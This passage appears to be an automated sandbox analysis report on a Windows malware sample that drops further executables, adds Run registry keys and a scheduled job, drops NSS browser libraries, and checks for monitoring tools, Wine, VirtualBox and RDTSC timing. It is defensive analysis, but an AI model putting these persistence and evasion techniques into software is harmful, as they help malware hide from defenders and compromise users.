Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Unpacked PE file: 26.2.7e96f85771.exe.810000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ypqgsygb:EW;vqrcrxym:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ypqgsygb:EW;vqrcrxym:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Unpacked PE file: 44.2.f84005b97f.exe.7d0000.0.unpack :EW;.rsrc :W;.idata :W;urronsyq:EW;rvyhmtwg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;urronsyq:EW;rvyhmtwg:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8A3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 8_2_6C8A3480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: 7e96f85771.exe.6.dr Static PE information: real checksum: 0x1d0261 should be: 0x1c7b72
Source: random[1].exe.6.dr Static PE information: real checksum: 0x2dfd78 should be: 0x2d9fcb
Source: num.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: f84005b97f.exe.6.dr Static PE information: real checksum: 0x2dfd78 should be: 0x2d9fcb
Source: g4Cyr2T5jq.exe Static PE information: real checksum: 0x1e9504 should be: 0x1e3389
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1e9504 should be: 0x1e3389
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1d0261 should be: 0x1c7b72
Source: num[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
PE file contains sections with non-standard names
Source: g4Cyr2T5jq.exe Static PE information: section name:
Source: g4Cyr2T5jq.exe Static PE information: section name: .idata
Source: g4Cyr2T5jq.exe Static PE information: section name:
Source: g4Cyr2T5jq.exe Static PE information: section name: ordjlgkm
Source: g4Cyr2T5jq.exe Static PE information: section name: zsnxwtzn
Source: g4Cyr2T5jq.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: ordjlgkm
Source: skotes.exe.0.dr Static PE information: section name: zsnxwtzn
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name: urronsyq
Source: random[1].exe.6.dr Static PE information: section name: rvyhmtwg
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: f84005b97f.exe.6.dr Static PE information: section name:
Source: f84005b97f.exe.6.dr Static PE information: section name: .rsrc
Source: f84005b97f.exe.6.dr Static PE information: section name: .idata
Source: f84005b97f.exe.6.dr Static PE information: section name: urronsyq
Source: f84005b97f.exe.6.dr Static PE information: section name: rvyhmtwg
Source: f84005b97f.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: ypqgsygb
Source: random[1].exe0.6.dr Static PE information: section name: vqrcrxym
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 7e96f85771.exe.6.dr Static PE information: section name:
Source: 7e96f85771.exe.6.dr Static PE information: section name: .rsrc
Source: 7e96f85771.exe.6.dr Static PE information: section name: .idata
Source: 7e96f85771.exe.6.dr Static PE information: section name:
Source: 7e96f85771.exe.6.dr Static PE information: section name: ypqgsygb
Source: 7e96f85771.exe.6.dr Static PE information: section name: vqrcrxym
Source: 7e96f85771.exe.6.dr Static PE information: section name: .taggant
Source: mozglue.dll.8.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.8.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.8.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.8.dr Static PE information: section name: .didat
Source: nss3.dll.8.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.8.dr Static PE information: section name: .00cfg
Source: softokn3.dll.8.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.8.dr Static PE information: section name: .00cfg
Source: freebl3.dll.8.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.8.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00E9D91C push ecx; ret 6_2_00E9D92F
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8DB536 push ecx; ret 8_2_6C8DB549
Source: g4Cyr2T5jq.exe Static PE information: section name: entropy: 7.977901506488262
Source: g4Cyr2T5jq.exe Static PE information: section name: ordjlgkm entropy: 7.954202579204902
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.977901506488262
Source: skotes.exe.0.dr Static PE information: section name: ordjlgkm entropy: 7.954202579204902
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.9818549090572155
Source: f84005b97f.exe.6.dr Static PE information: section name: entropy: 7.9818549090572155
Source: random[1].exe0.6.dr Static PE information: section name: ypqgsygb entropy: 7.95436124281918
Source: 7e96f85771.exe.6.dr Static PE information: section name: ypqgsygb entropy: 7.95436124281918
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7e96f85771.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f84005b97f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 88edf6a100.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f84005b97f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f84005b97f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7e96f85771.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7e96f85771.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 88edf6a100.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 88edf6a100.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C9055F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_6C9055F0
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 54F04E second address: 54F052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 54E93F second address: 54E945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 54E945 second address: 54E94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 54E94A second address: 54E950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 54E950 second address: 54E95E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 54E95E second address: 54E962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6CD0BF second address: 6CD0CB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F77291E5956h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DC523 second address: 6DC536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F772874F636h 0x0000000a pop esi 0x0000000b push esi 0x0000000c jns 00007F772874F636h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DC7B6 second address: 6DC7BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DCB63 second address: 6DCB6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DCB6A second address: 6DCB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jmp 00007F77291E5961h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F77291E5966h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DCB9D second address: 6DCBA7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F772874F636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DF944 second address: 6DF94A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
